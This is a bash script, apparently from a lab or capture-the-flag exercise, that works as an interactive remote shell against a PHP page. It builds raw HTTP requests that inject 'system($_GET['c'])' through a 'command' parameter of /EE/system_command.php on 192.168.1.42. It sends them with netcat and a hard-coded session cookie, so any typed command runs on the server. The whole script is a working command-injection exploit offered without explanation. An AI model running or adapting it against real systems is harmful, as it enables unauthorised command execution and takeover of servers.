#!/bin/bash

echo -n "$ > "
read CMD 

while [ true ];
do

	if [ $CMD == "quit" ];
	then
	  exit
	fi

	CMD2=`echo $CMD | sed -e "s/ /%20/g"`
	echo "COMANDO $CMD2"

	getpar1='GET /EE/system_command.php?c='
	getpart2='&command=%22;system%20($_GET[%27c%27]);%22 HTTP/1.1\n'

	request=$getpar1$CMD2$getpart2
	request1="Host: 192.168.1.42\n"
	request2="User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0\n"
	request3="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\n"
	request4="Accept-Language: en-US,en;q=0.5\n"
	request5="Accept-Encoding: gzip, deflate\n"
	request6="Connection: keep-alive\n"
	request7="Cookie: PHPSESSID=1756be58e88b7dc944c353ca6854c140\n"
	request8="Upgrade-Insecure-Requests: 1\n"
	request9="Cache-Control: max-age=0\n"
	request10="\n"
	request11="\n"

	peti="$request$request1$request2$request3$request4$request5$request6$request7$request8$request9$request10$request11"

	echo -e $peti
	echo -e $peti | nc 192.168.1.42 80

	echo -n "$ >"
	read CMD
done
